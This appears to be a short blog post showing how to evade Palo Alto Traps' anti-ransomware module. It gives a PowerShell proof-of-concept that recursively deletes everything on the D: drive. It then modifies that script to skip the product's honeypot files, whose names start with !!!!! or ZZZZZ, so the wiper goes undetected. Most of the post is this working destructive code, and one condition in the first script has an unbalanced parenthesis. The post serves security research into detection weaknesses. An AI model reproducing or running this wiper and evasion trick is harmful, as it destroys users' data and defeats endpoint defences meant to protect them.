Evading Palo Alto Traps Anti-Ransomware Protection

Standard

This piece could be the shortest article you have/will read today, so don’t blink:

The PoC script below will mimic a ransomware, it will wipe the whole D: drive except some pre-excluded files and folders ($TrustedFiles and $TrustedFolders).
When running this script, Traps (version 4.1.0 and above, with the Anti-Ransomware module activated) will flag it as a ransomware and kills the process, that is because it is performing bulk files/folders modification:

$basePath='d:\'
$TrustedFiles='SomeFile.csv'
$TrustedFolders='SomeFolder','SomeOtherFolder','$RECYCLE.BIN','System Volume Information'

foreach ($FolderCheck in (Get-ChildItem $basePath | ?{ $_.PSIsContainer })){

	$folderToCheck = $FolderCheck.name 
	$deletefolder = 1
	foreach ($Fol in $TrustedFolders){
		if ($Fol -eq $folderToCheck){
			$deletefolder = 0
		}
	}
	
	if($deletefolder){
		$fullPath=$basePath+$folderToCheck
		remove-item $fullPath -recurse
	}
	
}

foreach ($FileCheck in (Get-ChildItem $basePath | ?{ !$_.PSIsContainer })){

	$fileToCheck = $FileCheck.name 
	$deletefile = 1
	foreach ($Fil in $TrustedFiles){
		if (($Fil -eq $fileToCheck){
			$deletefile = 0
		}
	}
	
	if($deletefile){
		$fullPath=$basePath+$fileToCheck
		remove-item $fullPath
	}
	
}

So how Traps detects that?
Simply it creates honeypot files in all directories, with names like !!!!!2686401769.jpg and ZZZZZ1920832159.png.
Below is the list of all the file names:

So we edit our PoC script to exclude everything that starts with !!!!! or ZZZZZ, and it just works, Traps will mark it as a benign process:

$basePath='d:\'
$TrustedFiles='SomeFile.csv'
$TrustedFolders='SomeFolder','SomeOtherFolder','$RECYCLE.BIN','System Volume Information'

foreach ($FolderCheck in (Get-ChildItem $basePath | ?{ $_.PSIsContainer })){

	$folderToCheck = $FolderCheck.name 
	$deletefolder = 1
	foreach ($Fol in $TrustedFolders){
		if ($Fol -eq $folderToCheck){
			$deletefolder = 0
		}
	}
	
	if($deletefolder){
		$fullPath=$basePath+$folderToCheck
		remove-item $fullPath -recurse
	}
	
}

foreach ($FileCheck in (Get-ChildItem $basePath | ?{ !$_.PSIsContainer })){

	$fileToCheck = $FileCheck.name 
	$deletefile = 1
	foreach ($Fil in $TrustedFiles){
		if (($Fil -eq $fileToCheck) -or ($fileToCheck -match "^ZZZZZ") -or ($fileToCheck -match "^!!!!!")){
			$deletefile = 0
		}
	}
	
	if($deletefile){
		$fullPath=$basePath+$fileToCheck
		remove-item $fullPath
	}
	
}

Is it that easy or is there something I’m missing?

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s